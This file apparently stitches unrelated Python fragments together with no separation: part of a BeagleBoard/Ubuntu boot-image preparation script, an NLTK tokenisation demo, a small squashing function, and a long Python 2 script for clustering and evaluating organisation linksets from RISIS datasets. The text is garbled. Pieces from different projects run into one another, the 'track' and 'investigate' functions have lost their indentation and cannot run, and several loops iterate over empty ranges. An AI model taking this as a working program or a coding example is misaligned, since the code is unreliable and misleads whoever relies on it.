    """Download MLO, u-boot and the kernel for the selected Ubuntu release,
    install the boot script and the serial-console config into the target.

    Relies on the module-level global ``os_version`` (e.g. "PRECISE" or
    "QUANTAL") being injected by the framework before this is called —
    TODO confirm against the caller.
    """
    # Look the release-specific URLs up by name via globals(); this avoids
    # eval() on a string built at runtime while keeping the same behavior.
    KERNEL_URL = globals()[os_version + "_KERNEL_URL"]
    #KERNEL_SUFFIX = globals()[os_version + "_KERNEL_SUFFIX"]
    MLO_URL = globals()[os_version + "_MLO_URL"]
    UBOOT_URL = globals()[os_version + "_UBOOT_URL"]
    # Getting MLO (curl -C - resumes a partial download).
    mlo_path = os.path.join(os.getcwd(), "tmp", "MLO")
    print(MLO_URL)
    ret = subprocess.call(["curl", "-#", "-o", mlo_path, "-C", "-", MLO_URL])
    # Getting UBOOT
    uboot_path = os.path.join(os.getcwd(), "tmp", "u-boot.bin")
    print(UBOOT_URL)
    ret = subprocess.call(["curl", "-#", "-o", uboot_path, "-C", "-", UBOOT_URL])
    # Getting KERNEL
    kernel_path = os.path.join(os.getcwd(), "tmp", "uImage")
    print(KERNEL_URL)
    ret = subprocess.call(["curl", "-#", "-o", kernel_path, "-C", "-", KERNEL_URL])
    # Write the u-boot boot script and wrap it with mkimage.
    # BUG FIX: file handles were left open; use context managers.
    bootcmd_path = os.path.join(os.getcwd(), "tmp", "boot.script")
    with open(bootcmd_path, "w") as bootcmd:
        bootcmd.write(BOOTCMD)
    ret = subprocess.call(["mkimage", "-A", "arm", "-T", "script",
                           "-C", "none", "-n", '"Boot Image"', "-d", "tmp/boot.script", "boot/boot.src"])
    # Copy files over the boot partition.
    ret = subprocess.call(["cp", "-v", mlo_path, "boot"])
    ret = subprocess.call(["cp", "-v", uboot_path, "boot"])
    ret = subprocess.call(["cp", "-v", kernel_path, "boot"])
    # Install the upstart serial-console job into the rootfs.
    console_path = os.path.join(os.getcwd(), "tmp", "console.conf")
    with open(console_path, "w") as console:
        console.write(CONSOLE)
    ret = subprocess.call(["sudo", "cp", console_path, "rootfs/etc/init/"])
    console_script_path = os.path.join(os.getcwd(), "tmp", "serial-console")
    with open(console_script_path, "w") as console_script:
        console_script.write(SERIAL_CONSOLE_SCRIPT)
    ret = subprocess.call(["sudo", "cp", console_script_path, "rootfs/bin/serial-console"])
    # Cleaning (disabled: the chroot rm of /tmp/ was buggy)
    # rootfs_path = os.path.join(os.getcwd(), "rootfs")
    # ret = subprocess.call(["sudo", "chroot", rootfs_path, "rm", "-rf", "/tmp/"]) BUG
def prepare_kernel_devenv():
    """Clone mainline Linux and configure it for omap2plus cross-builds.

    BUG FIXES:
    - ``subprocess.call(["export", ...])`` can never work: ``export`` is a
      shell builtin, not an executable, and a child process cannot change
      this process's environment anyway. Set ``os.environ`` instead so the
      ``make`` call below actually sees ARCH / CROSS_COMPILE.
    - ``git clone`` of linux.git creates a directory named ``linux``, not
      ``kernel``; clone into an explicit ``kernel`` target so the
      subsequent chdir succeeds.
    - The bare ``except`` is narrowed to the errors ``check_output`` can
      actually raise.
    """
    import os
    DEPS = ["git", "arm-linux-gnueabihf-gcc", "arm-linux-gnueabi-gcc"]
    DEPS_PACKAGES = ["git", "gcc-arm-linux-gnueabi", "gcc-arm-linux-gnueabihf"]
    try:
        # `which` exits non-zero (CalledProcessError) for a missing tool.
        for dep in DEPS:
            output = subprocess.check_output(["which", dep])
    except (OSError, subprocess.CalledProcessError):
        print("""
Missing dependencies, you can install them with:
sudo apt-get install %s""" % " ".join(DEPS_PACKAGES))
        exit(1)
    print("This process may take a while, please wait ...")
    ret = subprocess.call(["git", "clone",
                           "git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git",
                           "kernel"])
    os.chdir("kernel")
    ret = subprocess.call(["git", "checkout", "master"])
    # Cross-compile environment for the make below (and any later calls).
    os.environ["ARCH"] = "arm"
    os.environ["CROSS_COMPILE"] = "arm-linux-gnueabihf-"
    ret = subprocess.call(["make", "omap2plus_defconfig"])
|
from nltk import sent_tokenize, word_tokenize
# Demo: NLTK sentence and word tokenisation on a sample paragraph.
text = "Hello students, how are you doing today? Have you recovered from the exam? I hope you are feeling better. Things will be fine."
print(sent_tokenize(text))
print(word_tokenize(text))
# Print every word token on its own line.
for i in word_tokenize(text):
    print(i)
# encoding=utf-8
import math
def sigmoid(x):
    """Softsign-style squashing: x / (|x| + 1.6), bounded in (-1, 1).

    Replaces the exponential form (kept below for reference) with a
    cheaper rational approximation.
    """
    # return math.exp(x)/ (math.exp(x) + 10)
    denominator = float(math.fabs(x) + 1.6)
    return x / denominator
import cStringIO as Buffer
import Alignments.UserActivities.Plots as Plt
import Alignments.UserActivities.Clustering as Cls
import Alignments.Settings as St
from os import listdir, system, path # , startfile
from Alignments.Utility import normalise_path as nrm
from os.path import join, isdir, isfile
import codecs # , subprocess
# import _winreg as winreg
# node = int(raw_input("\n\tNODES?\t"))
# v = int(raw_input("\n\tEDGES?\t"))
# d = int(raw_input("\n\tDIAMETER?\t"))
# b = int(raw_input("\n\tBRIDGE?\t"))
# b = 1
# d = 3
# v = 7
# node = 6
# Toy graph metrics (bridges, diameter, edges, nodes) used while
# experimenting with the cluster-quality formulas kept commented below.
b = 4
d = 4
v = 4
node = 5
# ==> 0.32 / 0.35
# max_connectivity = node - 1
# max = node*(node - 1)/2
# nc = 1 - (v/float(max))
# nb = b / float(node -1)
# nd = (d - 1)/float (node - 2)
# quality = float(nc + nb + nd)/3
# quality2 = float(nd * nc + nb)/2
# quality3 = (1*math.pow(2,b)/math.pow(2,d) + nc) / float(2)
# print "MAX: {}\nCLOSURE: {}\nBRIDGE: {}\nDIAMETER: {}\nQUALITY: {} {} {}".format(
#     max, nc, nb, nd, quality, quality2, quality3)
# Linksets and sample resources used in the disambiguation experiments.
linkset_1 = "http://risis.eu/linkset/clustered_exactStrSim_N167245093"
linkset_2 = "http://risis.eu/linkset/clustered_exactStrSim_N1245679810818748702"
linkset_3 = "http://risis.eu/linkset/clustered_test"
resources_list = ["<http://risis.eu/orgref_20170703/resource/1389122>",
                  "<http://risis.eu/cordisH2020/resource/participant_993809912>",
                  "<http://www.grid.ac/institutes/grid.1034.6>"]
# print disambiguate_network(linkset_1, resources_list)
# Cls.cluster_d_test(linkset_4, network_size=3, directory="C:\Users\Al\Videos\LinkMetric",
#                    greater_equal=True, limit=50000)
linkset = "http://risis.eu/linkset/clustered_exactStrSim_N1245679810818748702"
org = "http://risis.eu/orgreg_20170718/resource/organization"
uni = "http://risis.eu/orgreg_20170718/ontology/class/University"
ds = "http://risis.eu/dataset/orgreg_20170718"
# resources_matched(alignment=linkset, dataset=ds, resource_type=uni, matched=True)
# THE INITIAL DATASET IS grid_20170712
# [GRID] graph, entity type, clustering and linking properties.
grid_GRAPH = "http://risis.eu/dataset/grid_20170712"
grid_org_type = "http://xmlns.com/foaf/0.1/Organization"
grid_cluster_PROPS = ["<http://www.grid.ac/ontology/hasAddress>/<http://www.grid.ac/ontology/countryCode>",
                      "<http://www.grid.ac/ontology/hasAddress>/<http://www.grid.ac/ontology/countryName>"]
grid_link_org_props = ["http://www.w3.org/2000/01/rdf-schema#label", "http://www.w3.org/2004/02/skos/core#prefLabel",
                       "http://www.w3.org/2004/02/skos/core#altLabel",
                       "http://xmlns.com/foaf/0.1/homepage",
                       "<http://www.grid.ac/ontology/hasAddress>/<http://www.w3.org/2003/01/geo/wgs84_pos#lat>",
                       "<http://www.grid.ac/ontology/hasAddress>/<http://www.w3.org/2003/01/geo/wgs84_pos#long>"]
grid_main_dict = {St.graph: grid_GRAPH,
                  St.data: [{St.entity_datatype: grid_org_type, St.properties: grid_link_org_props}]}
# [ETER] DATASET TO ADD
eter_GRAPH = "http://risis.eu/dataset/eter_2014"
eter_cluster_PROPS = ["http://risis.eu/eter_2014/ontology/predicate/Country_Code"]
eter_org_type = "http://risis.eu/eter_2014/ontology/class/University"
eter_link_org_props = ["http://risis.eu/eter_2014/ontology/predicate/Institution_Name",
                       "<http://risis.eu/eter_2014/ontology/predicate/English_Institution_Name>",
                       "http://risis.eu/eter_2014/ontology/predicate/Name_of_foreign_institution",
                       "http://risis.eu/eter_2014/ontology/predicate/Institutional_website",
                       "http://risis.eu/eter_2014/ontology/predicate/Geographic_coordinates__longitude",
                       "http://risis.eu/eter_2014/ontology/predicate/Geographic_coordinates__latitude"]
eter_main_dict = {St.graph: eter_GRAPH,
                  St.data: [{St.entity_datatype: eter_org_type, St.properties: eter_link_org_props}]}
# [ORGREG] DATASET TO ADD
# NOTE: adjacent string literals below are implicitly concatenated into
# one property path.
orgreg_GRAPH = "http://risis.eu/dataset/orgreg_20170718"
orgreg_cluster_PROPS = ["<http://risis.eu/orgreg_20170718/ontology/predicate/locationOf>"
                        "/<http://risis.eu/orgreg_20170718/ontology/predicate/Country_of_location>",
                        "http://risis.eu/orgreg_20170718/ontology/predicate/Country_of_establishment"]
orgreg_org_type = "http://risis.eu/orgreg_20170718/resource/organization"
orgreg_link_org_props = ["http://risis.eu/orgreg_20170718/ontology/predicate/Name_of_entity",
                         "http://risis.eu/orgreg_20170718/ontology/predicate/English_name_of_entity",
                         "http://risis.eu/orgreg_20170718/ontology/predicate/Entity_current_name_English",
                         "http://risis.eu/orgreg_20170718/ontology/predicate/Website_of_entity",
                         "<http://risis.eu/orgreg_20170718/ontology/predicate/locationOf>"
                         "/<http://risis.eu/orgreg_20170718/ontology/predicate/Geographical_coordinates__latitude>",
                         "<http://risis.eu/orgreg_20170718/ontology/predicate/locationOf>"
                         "/<http://risis.eu/orgreg_20170718/ontology/predicate/Geographical_coordinates__longitude>"]
orgreg_main_dict = {St.graph: orgreg_GRAPH,
                    St.data: [{St.entity_datatype: orgreg_org_type, St.properties: orgreg_link_org_props}]}
# The datasets to align/cluster together.
targets = [
    grid_main_dict,
    orgreg_main_dict,
    eter_main_dict
]
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
TEST FUNCTIONS
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def folder_check(file_1, file_2, diff_1=False, diff_2=False, intersection=False,
                 tracking=None, track_dir=None, activated=False):
    """Compare two result directories and report cluster-quality verdicts.

    For each folder name in the requested set operation (difference /
    intersection), the first .txt report inside it is scanned for the
    "QUALITY USED" line and its value is bucketed as GOOD (<= 0.1),
    BAD (>= 0.25) or UNDECIDED (in between). With ``tracking=True`` the
    resource listed on line 6 of the report is traced via track() and the
    user is prompted to continue. Python 2 only (print statement,
    raw_input). No-op unless ``activated`` is True.
    """
    if activated is False:
        return None
    # Marker line inside each report that carries the quality score.
    keyword = "\tQUALITY USED"
    set_a = set([])
    set_b = set([])
    folders_1 = []
    folders_2 = []
    if path.isdir(file_1):
        folders_1 = [f for f in listdir(nrm(file_1)) if isdir(join(nrm(file_1), f))]
        set_a = set(folders_1)
    if path.isdir(file_2):
        folders_2 = [f for f in listdir(nrm(file_2)) if isdir(join(nrm(file_2), f))]
        set_b = set(folders_2)
    print "\nPATH 1: {}".format(len(folders_1))
    print "PATH : {}".format(len(folders_2))
    # Dynamically get path to AcroRD32.exe
    # acro_read = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, 'Software\\Adobe\\Acrobat\Exe')
    if diff_1 is True:
        # Folders present in file_1 but not in file_2.
        diff = set_a - set_b
        print "\nDIFF(FOLDER_1 [{}] - FOLDER_2 [{}]) = [{}]".format(len(folders_1), len(folders_2), len(diff))
        count = 0
        good = 0
        bad = 0
        uncertain = 0
        for item in diff:
            count += 1
            output = "\t>>> {}".format(item)
            target = join(nrm(file_1), item)
            doc = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.txt')]
            if doc:
                target_path = join(nrm(target), doc[0])
                read = open(target_path)
                # Scan the report line by line for the quality marker.
                # NOTE(review): only the BAD branch breaks; GOOD/UNDECIDED
                # keep scanning, so a second marker line could re-count —
                # preserved as-is, confirm it is intentional.
                while True:
                    node = read.readline()
                    if len(node) == 0:
                        break
                    if node.startswith(keyword):
                        value = float(node.replace(keyword, "").replace(":", "").strip())
                        if value <= 0.1:
                            good +=1
                            output = "{:<22}{:12}\t{}".format(output, "GOOD", value)
                        elif value >= 0.25:
                            bad += 1
                            output = "{:<22}{:12}\t{}".format(output, "BAD", value)
                            break
                        elif value > 0.1 and value < 0.25:
                            uncertain += 1
                            output = "{:<22}{:12}\t{}".format(output, "UNDECIDED", value)
                read.close()
                print output
            # doc2 = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.pdf')]
            # OPEN THE PDF FROM DEFAULT READER
            # target_path2 = join(nrm(target), doc2[0])
            # system(target_path2)
            # startfile(target_path2)
            # OPEN WITH ADOBE
            # cmd = '{0} /N /T "{1}" ""'.format(acro_read, target_path2)
            # print "PRINTING PDF"
            # subprocess.Popen(cmd)
            # reading = open(target_path2)
            # print reading.read()
            if doc and tracking is True:
                # The resource id sits on line 6 of the report.
                target_path = join(nrm(target), doc[0])
                read = open(target_path)
                for i in range(0, 6):
                    node = read.readline().strip()
                read.close()
                print "\t{}-TRACKING {}". format(count, node)
                track(directory=track_dir, resource=node, activated=activated)
                next_step = raw_input("\n\tCONTINUE?\t")
                if next_step.lower() == "yes" or next_step.lower() == "y" or next_step.lower() == "1":
                    continue
                else:
                    exit(0)
        print "GOOD {0}/{3} BAD {1}/{3} UNCERTAIN {2}/{3}".format(good, bad, uncertain, len(diff))
    if diff_2 is True:
        # Folders present in file_2 but not in file_1 (same scan as above).
        count = 0
        good = 0
        bad = 0
        uncertain = 0
        diff = set_b - set_a
        print "\nDIFF(FOLDER_2 [{}] - FOLDER_1 [{}]) = [{}]".format(len(folders_2), len(folders_1), len(diff))
        for item in diff:
            count += 1
            output = "\t>>> {}".format(item)
            target = join(nrm(file_2), item)
            doc = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.txt')]
            # doc2 = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.pdf')]
            if doc:
                target_path = join(nrm(target), doc[0])
                read = open(target_path)
                while True:
                    node = read.readline()
                    if len(node) == 0:
                        break
                    if node.startswith(keyword):
                        value = float(node.replace(keyword, "").replace(":", "").strip())
                        if value <= 0.1:
                            good +=1
                            output = "{:<22}{:12}\t{}".format(output, "GOOD", value)
                        elif value >= 0.25:
                            bad += 1
                            output = "{:<22}{:12}\t{}".format(output, "BAD", value)
                            break
                        elif value > 0.1 and value < 0.25:
                            uncertain += 1
                            output = "{:<22}{:12}\t{}".format(output, "UNDECIDED", value)
                read.close()
                print output
            if doc and tracking is True:
                target_path = join(nrm(target), doc[0])
                read = open(target_path)
                for i in range(0, 6):
                    node = read.readline().strip()
                read.close()
                print "\t{}-TRACKING {}". format(count, node)
                track(directory=track_dir, resource=node, activated=activated)
                next_step = raw_input("\n\tCONTINUE?\t")
                if next_step.lower() == "yes" or next_step.lower() == "y" or next_step.lower() == "1":
                    continue
                else:
                    exit(0)
        print "GOOD {0}/{3} BAD {1}/{3} UNCERTAIN {2}/{3}".format(good, bad, uncertain, len(diff))
    if intersection is True:
        # Folders present in both directories (reports read from file_2;
        # no tracking in this branch).
        diff = set_a.intersection(set_b)
        print "\nINTERSECTION(FOLDER_1 [{}] - FOLDER_2 [{}]) [{}]".format(
            len(folders_1), len(folders_2), len(diff))
        good = 0
        bad = 0
        uncertain = 0
        for item in diff:
            output = "\t>>> {}".format(item)
            target = join(nrm(file_2), item)
            doc = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.txt')]
            # doc2 = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.pdf')]
            if doc:
                target_path = join(nrm(target), doc[0])
                read = open(target_path)
                while True:
                    node = read.readline()
                    if len(node) == 0:
                        break
                    if node.startswith(keyword):
                        value = float(node.replace(keyword, "").replace(":", "").strip())
                        if value <= 0.1:
                            good +=1
                            output = "{:<22}{:12}\t{}".format(output, "GOOD", value)
                        elif value >= 0.25:
                            bad += 1
                            output = "{:<22}{:12}\t{}".format(output, "BAD", value)
                            break
                        elif value > 0.1 and value < 0.25:
                            uncertain += 1
                            output = "{:<22}{:12}\t{}".format(output, "UNDECIDED", value)
                read.close()
                print output
        print "GOOD {0}/{3} BAD {1}/{3} UNCERTAIN {2}/{3}".format(good, bad, uncertain, len(diff))
def track(directory, resource, activated=False):
if activated is False:
return None
print "\nMAIN DIRECTORY {}".format(directory)
# LOOK FOR MAIN FOLDERS IN MAIN DIRECTORY
main_folders = [f for f in listdir(nrm(directory)) if isdir(join(nrm(directory), f))]
# GO THROUGH EACH MAIN FOLDER
for main_folder in main_folders:
main_path = join(directory, main_folder)
# print "\tMAIN-FOLDER: {}".format(main_folder)
# FOREACH MAIN FOLDER GAT THE SUB-FOLDER
sub_folders = [f for f in listdir(nrm(main_path)) if isdir(join(nrm(main_path), f))]
for sub_folder in sub_folders:
sub_path = join(main_path, sub_folder)
# print "\t\tSUB-FOLDER: {}".format(sub_folder)
# TARGET FOLDERS
target_folder = [f for f in listdir(nrm(sub_path)) if isdir(join(nrm(sub_path), f))]
for target in target_folder:
i_folder = "{}".format(join(main_path, sub_path, target))
# print "\t\t\tTARGET-FOLDER: {}".format(target)
i_file = [f for f in listdir(nrm(i_folder)) if isfile(join(nrm(i_folder), f))]
for target_file in i_file:
if target_file.lower().endswith(".txt"):
target_path = join(main_path, sub_path, target, target_file)
wr = codecs.open(target_path, "rb")
text = wr.read()
wr.close()
result = text.__contains__(resource)
if result is True:
print "\n\tMAIN-FOLDER: {}".format(main_folder)
print "\t\tSUB-FOLDER: {}".format(sub_folder)
print "\t\t\tTARGET-FOLDER: {}".format(target)
print "\t\t\t\tTARGET FILE: {}".format(target_file)
target = join(main_path, sub_path, target)
print "\tPATH: {}".format(target)
pdf = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.pdf')]
txt = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.txt')]
trg_path = join(nrm(target), pdf[0])
txt_path = join(nrm(target), txt[0])
system(trg_path)
# system(txt_path)
# print "\t\t\t\t{}".format(result)
def investigate(target_directory, track_directory=None, activated=False):
if activated is False:
return None
folders = [f for f in listdir(nrm(target_directory)) if isdir(join(nrm(target_directory), f))]
print "\nINVESTIGATING NO: {}".format(len(folders))
count = 0
for item in folders:
count += 1
print "\t>>> {}".format(item)
target = join(nrm(target_directory), item)
doc = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.txt')]
pdf = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.pdf')]
if doc and pdf:
doc_path = join(nrm(target), doc[0])
read = open(doc_path)
node= ""
for i in range(0,6):
node = read.readline().strip()
if track_directory and path.isdir(track_directory):
print "\t{}-TRACKING {}".format(count, node)
track(directory=track_directory, resource=node, activated=activated)
# system(doc_path)
elif pdf:
pdf_path = join(nrm(target), pdf[0])
system(pdf_path)
# system(doc_path)
next_step = raw_input("\tCONTINUE?\t")
print ""
if next_step.lower() == "yes" or next_step.lower() == "y" or next_step.lower() == "1":
continue
else:
exit(0)
def generate_eval_sheet(alignment, network_size, greater_equal=True, targets=None,):
    """Build and print a manual-evaluation sheet for clusters of ``alignment``.

    :param alignment: linkset/lens URI whose link network is clustered.
    :param network_size: cluster size of interest.
    :param greater_equal: if True keep clusters of size >= network_size,
        otherwise only clusters of exactly that size.
    :param targets: NOTE(review) -- accepted but unused in the live code;
        ``test`` (called below) reads a module-level ``targets`` instead.
        Confirm this indirection is intended.
    """
    # RUN THE CLUSTER
    count = 0
    tabs = "\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t"  # NOTE(review): appears unused.
    a_builder = Buffer.StringIO()
    a_builder.write("Count ID STRUCTURE E-STRUCTURE-SIZE NETWORK QUALITY REFERENCE\n")
    # Presumably yields {cluster_id: {..., St.children: [...]}} -- confirm against Cls.
    clusters_0 = Cls.links_clustering(alignment, None)
    for i_cluster in clusters_0.items():
        children = i_cluster[1][St.children]
        check = len(children) >= network_size if greater_equal else len(children) == network_size
        first = False
        if check:
            count += 1
            # 2: FETCHING THE CORRESPONDENTS
            # The smallest member hash serves as a stable cluster identifier.
            smallest_hash = float('inf')
            for child in children:
                hashed = hash(child)
                if hashed <= smallest_hash:
                    smallest_hash = hashed
            test(count, smallest_hash, a_builder, alignment, children)
            # # MAKE SURE THE FILE NAME OF THE CLUSTER IS ALWAYS THE SAME
            # smallest_hash = "{}".format(str(smallest_hash).replace("-", "N")) if str(
            # smallest_hash).startswith("-") \
            # else "P{}".format(smallest_hash)
            #
            # a_builder.write("\n{:5}\t{:20}{:12}{:20}{:20}".format(count, smallest_hash, "", "", ""))
            # if targets is None:
            # a_builder.write(Cls.disambiguate_network(alignment, children))
            # else:
            # response = Cls.disambiguate_network_2(children, targets, output=False)
            # if response:
            # temp = ""
            # dataset = ""
            # # for line in response:
            # # print line
            #
            # for i in range(1, len(response)):
            # if i == 1:
            # temp = response[i][1]
            #
            # elif dataset == response[i][0]:
            # temp = "{} | {}".format(temp, response[i][1])
            #
            #
            # else:
            # if first is False:
            # a_builder.write("{}\n".format(temp))
            # else:
            # a_builder.write( "{:80}{}\n".format("", temp))
            # first = True
            # temp = response[i][1]
            #
            #
            # dataset = response[i][0]
            # a_builder.write( "{:80}{}\n".format("", temp))
    print a_builder.getvalue()
    # next_step = raw_input("\tCONTINUE?\t")
    # if next_step.lower() == "yes" or next_step.lower() == "y" or next_step.lower() == "1":
    # continue
    # else:
    # exit(0)
    # NOTE(review): activated=False makes this a no-op; indentation was
    # reconstructed -- it appears to sit at function level, after the loop.
    investigate("C:\Users\Al\Videos\LinkMetric\TRIAL-2\3_Analysis_20180111"
                "\union_Grid_20170712_Eter_2014_Orgreg_20170718_P1310881121", "C:\Users\Al\Videos\LinkMetric\TRIAL-2",
                activated=False)
def test(count, smallest_hash, a_builder, alignment, children):
    """Append one evaluation-sheet row for a cluster to ``a_builder``.

    NOTE(review): despite the name this is a report-row writer, not a unit
    test. It reads the module-level ``targets`` (NOT a parameter) and the
    ``Cls`` helper module -- confirm both are defined earlier in the file.
    Indentation below was reconstructed from the commented-out copy inside
    ``generate_eval_sheet``; verify it matches the original layout.
    """
    # Tracks whether the first dataset group has been flushed, which controls
    # the left padding of subsequent groups.
    first = False
    a_builder.write("\n{:<5}\t{:<20}{:12}{:20}{:20}".format(count, smallest_hash, "", "", ""))
    if targets is None:
        a_builder.write(Cls.disambiguate_network(alignment, children))
    else:
        response = Cls.disambiguate_network_2(children, targets, output=False)
        if response:
            temp = ""
            dataset = ""
            # for line in response:
            #     print line
            # Group consecutive response rows by dataset (column 0), joining
            # their values (column 1) with " | "; flush a line on each change.
            for i in range(1, len(response)):
                if i == 1:
                    temp = response[i][1]
                elif dataset == response[i][0]:
                    temp = "{} | {}".format(temp, response[i][1])
                else:
                    if first is False:
                        a_builder.write("{}\n".format(temp))
                    else:
                        a_builder.write("{:80}{}\n".format("", temp))
                    first = True
                    temp = response[i][1]
                dataset = response[i][0]
            # Flush the final group.
            a_builder.write("{:80}{}\n".format("", temp))
# generate_eval_sheet("http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_P1310881121", network_size=3,
# greater_equal=False, targets=targets)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
COMPUTING AN ALIGNMENT STATISTICS
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# OUTPUT FALSE RETURNS THE MATRIX WHILE OUTPUT TRUE RETURNS THE DISPLAY MATRIX IN A TABLE FORMAT
# NOTE(review): `Cls`, `linkset`, `ds` and `org` come from earlier in this
# file (not visible in this chunk); activated=False keeps the call disabled.
stats = Cls.resource_stat(alignment=linkset, dataset=ds, resource_type=org, output=True, activated=False)
# for stat in stats:
# for key, value in stat.items():
# print "{:21} : {}".format(key, value)
# Cls.disambiguate_network_2(["<http://www.grid.ac/institutes/grid.474119.e>",
# "<http://risis.eu/orgreg_20170718/resource/HR1016>",
# "<http://www.grid.ac/institutes/grid.4808.4>"], targets, output=True)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
PLOT THE LINK NETWORK
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# Linkset/lens URIs used by the plotting experiments below.
size = 7  # NOTE(review): appears unused in this chunk -- confirm against the rest of the file.
ls_4 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N1655042445"
ls_5 = "http://risis.eu/lens/union_Eter_2014_Orgreg_20170718_Grid_20170712_N2030153069"
ls_1k = "http://risis.eu/lens/union_Eter_2014_Orgreg_20170718_Grid_20170712_P1640316176"
ls_app = "http://risis.eu/lens/union_Eter_2014_Orgreg_20170718_Grid_20170712_N1942436340"
ls_app_50m = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_P571882700"
directory = "C:\Users\Al\Videos\LinkMetric\Test-2"
# activated=False keeps this plotting call disabled; flip to True to run it.
Plt.cluster_d_test(ls_app_50m, network_size=3, targets=targets,
                   directory=directory, greater_equal=False, limit=70000, activated=False)
# # GEO-SIMILARITY OF NEARBY [1 KILOMETER]
# # REFINED BY EXACT MATCHED
# # ==> UNION OF 8 LINKSETS
# union_03 = "http://risis.eu/lens/union_Eter_2014_Orgreg_20170718_Grid_20170712_P1476302481"
# directory = "C:\Users\Al\Videos\LinkMetric\Test-3"
# Plt.cluster_d_test(union_03, network_size=3, targets=targets,
#                    directory=directory, greater_equal=False, limit=70000, activated=False)
# track(directory, "Academy of Fine Arts Vienna", activated=False)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# RUN 00: GEO-SIMILARITY OF NEARBY [50 meters BEFORE]
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# ==> UNION OF 8 LINKSETS
# 93 clusters of size 3
# 62 clusters of size 4
# 16 clusters of size 5
# 17 clusters of size 6
# 08 clusters of size 7
# 08 clusters of size 8
# 03 clusters of size 9
# 02 clusters of size 10
greater_equal = False
directory = "C:\Users\Al\Videos\LinkMetric\TRIAL-5"
union_00 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_P451472011"
union_01 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_P1310881121"
track(directory, "C.D.A. College", activated=False)
# NOTE(review): range(3, 0) is EMPTY, so this loop body never executes;
# range(3, 0, -1) (or range(3, N)) was probably intended -- confirm.
for i in range(3, 0):
    print "\nITERATION {}".format(i)
    Plt.cluster_d_test(union_00, network_size=i, targets=targets,
                       directory=directory, greater_equal=greater_equal, limit=None, activated=True)
# GEO-SIMILARITY OF NEARBY [50 meters]
# REFINED BY REFINED MATCHED
# ==> UNION OF 8 LINKSETS
# 29 clusters of size 3
# 6 clusters of size 4
# 16 clusters of size 5
# 17 clusters of size 6
# directory = "C:\Users\Al\Videos\LinkMetric\TRIAL-2"
track(directory, "Policejní akademie České republiky v Praze", activated=False)
# NOTE(review): empty range again -- see the note above.
for i in range(3, 0):
    print "\nITERATION {}".format(i)
    Plt.cluster_d_test(union_01, network_size=i, targets=targets,
                       directory=directory, greater_equal=greater_equal, limit=None, activated=True)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
RUN 02: GEO-SIMILARITY OF NEARBY [500 meters]
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# GEO-SIMILARITY OF NEARBY [100 meters]
# REFINED BY REFINED MATCHED
# ==> UNION OF 8 LINKSETS
# 155 CLUSTERS of size 3
# 010 clusters of size 4
# 002 clusters of size 5
# 004 clusters of size 6
# union_02 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N545709154"
union_021 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N747654693"
union_022 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N758253463"
# directory = "C:\Users\Al\Videos\LinkMetric\TRIAL-2"
track(directory, "Policejní akademie České republiky v Praze", activated=False)
# NOTE(review): range(3, 0) is empty, so neither loop below ever executes;
# range(3, 0, -1) was probably intended -- confirm.
for i in range(3, 0):
    print "\nITERATION {}".format(i)
    Plt.cluster_d_test(union_021, network_size=i, targets=targets,
                       directory=directory, greater_equal=greater_equal, limit=None, activated=True)
for i in range(3, 0):
    print "\nITERATION {}".format(i)
    Plt.cluster_d_test(union_022, network_size=i, targets=targets,
                       directory=directory, greater_equal=greater_equal, limit=None, activated=True)
# LOOKING AT CLUSTERS THAT EVOLVED AS THE MATCHING METHOD LOOSENS UP
# THE SET DIFFERENCE REVEALS THAT 26 CLUSTERS OF SIZE 3 EVOLVED
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
RUN 03: GEO-SIMILARITY OF NEARBY [2 KILOMETER]
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# GEO-SIMILARITY OF NEARBY [1 KILOMETER]
# REFINED BY REFINED MATCHED
# ==> UNION OF 8 LINKSETS
# 350 CLUSTERS of size 3
# 018 clusters of size 4
# 004 clusters of size 5
# 007 clusters of size 6
# union_03 = "http://risis.eu/lens/union_Eter_2014_Orgreg_20170718_Grid_20170712_P2072038799"
# BEFORE
union_031 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N1996365419"
# AFTER
union_032 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N162258616"
